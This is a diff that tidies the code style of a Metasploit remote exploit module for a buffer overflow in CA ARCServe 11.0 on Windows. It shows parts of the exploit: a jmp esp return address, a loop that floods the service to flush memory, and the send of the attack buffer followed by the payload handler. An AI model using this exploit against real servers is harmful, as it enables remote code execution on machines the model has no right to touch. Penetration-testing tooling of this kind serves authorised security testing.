@@ -31,9 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Payload' => {
           'Space' => 1000,
           'BadChars' => "\x00",
-          'StackAdjustment' => -3500,
+          'StackAdjustment' => -3500
         },
-        'Platform' => %w{win},
         'Targets' => [
           # This exploit requires a jmp esp for return
           ['ARCServe 11.0 Asbrdcst.dll 12/12/2003', { 'Platform' => 'win', 'Ret' => 0x20c11d64 }], # jmp esp
@@ -69,13 +68,13 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Trying target #{target.name}...")
 
     # The 'one line' request does not work against Windows 2003
-    1.upto(5) { |i|
+    1.upto(5) do |_i|
       # Flush some memory
       connect
       begin
         sock.put("\xff" * 0x12000)
         sock.get_once
-      rescue
+      rescue StandardError
       end
       disconnect
 
@@ -93,11 +92,11 @@ class MetasploitModule < Msf::Exploit::Remote
       begin
         sock.put(buf)
         sock.get_once
-      rescue
+      rescue StandardError
       end
 
       handler
       disconnect
-    }
+    end
   end
 end
